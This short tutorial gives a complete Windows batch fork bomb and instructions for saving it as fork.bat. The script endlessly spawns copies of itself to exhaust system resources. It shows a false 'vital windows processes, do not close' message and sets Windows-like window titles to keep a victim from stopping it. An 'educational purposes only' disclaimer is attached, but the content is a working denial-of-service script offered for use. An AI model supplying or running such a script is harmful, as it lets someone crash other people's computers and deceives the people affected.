Introduction: Simple Windows Fork Bomb

DISCLAIMER:
I am not responsible for any damage to your computer due to running this file. This is for educational purposes only.

Step 1: Create a .txt File and Paste This:

@echo off
echo Starting vital windows processes, do not close.
Pushd "%`dp0"
:a
title Win%random%a
timeout /t 0 /nobreak >nul
start fork.bat
goto a

Step 2: Save

Go to save as
Where it says text files click and choose all files
Save as fork.bat
IT MUST BE SAVED AS fork.bat
NO OTHER NAME WILL WORK!